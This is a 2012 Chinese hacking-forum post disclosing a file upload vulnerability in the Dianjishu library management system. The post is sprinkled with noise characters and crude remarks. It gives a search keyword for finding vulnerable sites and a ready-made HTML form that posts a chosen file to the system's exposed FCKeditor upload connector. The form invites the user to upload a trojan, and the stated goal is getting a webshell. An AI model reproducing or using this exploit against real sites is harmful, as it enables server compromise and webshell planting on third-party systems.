找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7578|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞0 W7 i3 ~! O+ |/ k2 r: E, x; s
作者:冰锋刺客+ R, k. t2 ]# l4 J
厂商:点击书(dianjishu.com)7 H) {1 J- n4 s
日期:2012-6-21; \7 G$ U% T' U& u7 v0 E9 g6 X* ?) ]! h

1 j! g3 ]& O  t( V/ eI 概述6 p- j% |+ j3 Q6 b
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell" e& [6 h# ~. u2 [
II 简介
% K# ]& f4 W# b2 D   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
; I4 Z! |/ J5 K3 C* k 补充一个漏洞+ S7 Y& g/ K! P" p# j9 Z
<form id="frmUpload" enctype="multipart/form-data"
: a: a: ]" q1 [: S. e+ v1 e) P action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
: M; b" ?5 A" C9 Z$ d! W' ? <input id="btnUpload" type="submit" value="操翻他">0 o( ^0 R. R1 \' o# \$ T3 y
</form>
  r5 x. L& G. Y! q" ? 你们懂的
8 l2 e" r9 z5 u. t0 f; J. l* p8 D 那傻逼提供还需要改包.
3 c8 {$ t! n7 b2 ` 自己看了下源代码发现fckeditor
( c. s' u9 b. Q! i* ^! e 直接秒杀- |  M4 ]+ }5 e# B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表